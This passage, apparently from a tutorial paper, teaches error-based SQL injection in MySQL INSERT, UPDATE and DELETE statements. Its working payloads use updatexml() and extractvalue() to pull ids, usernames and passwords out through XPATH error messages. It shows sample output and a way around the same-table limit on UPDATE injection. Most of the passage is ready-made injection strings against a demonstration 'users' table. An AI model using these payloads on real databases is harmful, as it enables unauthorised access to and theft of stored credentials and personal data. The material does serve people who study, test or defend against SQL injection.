6
Let’s dump the first entry in the 'users' table using INSERT and DELETE.
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or
updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users
limit 0,1)),0) or '', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~1:Olivia:Nervo'
DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id,
username, password) FROM users limit 0,1)),0) or '';
ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'
You can retrieve tables, columns using the Updatexml() function in insert, UPDATE and
DELETE statements. However you cannot dump data using the UPDATE statement if you are
in the same table. For example now I am in the users table. If I run this query
UPDATE users SET password='Nicky' or updatexml(1,concat(0x7e,(SELECT
concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE
id=2 and username='Olivia';
This won’t give out any data because we are trying to use the target database for
dumping data. In these kinds of scenarios you the target database should be
different. Once again for the sake of this paper create a new database as 'students'
with the columns id, name, address and insert some values.
Now if the injection point was in the 'students' table we can dump data from the
'users' table other than the data in the table itself. This applies to the UPDATE
statement only.
UPDATE students SET name='Nicky' or Updatexml(1,concat(0x7e,(SELECT
concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE
id=1;
ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'
If you are stuck in the UPDATE statement injection you can use double query injection
for that. I have discussed in the next few titles.
Injection Using extractvalue()
This function can be used in XPATH injections too. However our payload using this
function would like this.
or extractvalue(1,concat(0x7e,database())) or
Insert
We can apply it in the insert statement like this.
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or
extractvalue(1,concat(0x7e,database())) or'', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~newdb'